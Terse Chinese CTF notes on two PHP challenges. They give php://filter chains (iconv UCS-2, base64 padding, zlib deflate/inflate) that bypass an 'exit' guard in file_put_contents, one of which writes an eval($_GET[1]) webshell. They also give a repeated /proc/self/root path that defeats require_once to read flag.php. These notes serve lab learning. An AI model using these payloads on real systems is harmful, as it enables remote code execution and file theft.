checkin
- 伪协议处理时会对过滤器urldecode一次,所以是可以利用二次编码绕过
- 绕过“死亡exit”
- 关于file_put_contents的一些小测试
- base64
- rot13
- strip_tags
php://filter//convert.iconv.UCS-2LE.UCS-2BE|?<hp phpipfn(o;)>?/resource=Cyc1e.php- base64+iconv解决
=问题$a='php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode|AAPD9waHAgcGhwaW5mbygpOz8+/resource=Cyc1e.php'; #base64编码前补了AA,原理一样,补齐位数 - zlib.inflate/deflate
php://filter/zlib.deflate|string.tolower|zlib.inflate|?><?php%0deval($_GET[1]);?>/resource=Cyc1e.php
Make PHP Great Again
从PHP源码看PHP文件操作缺陷与利用技巧
php源码分析 require_once 绕过不能重复包含文件的限制
require_once 包含的软链接层数较多使 once 的 hash 匹配会直接失效造成重复包含
http://cefiejf3iofj3s.c.zhaoj.in/?file=php://filter/read=convert.base64-encode/resource=file:///proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php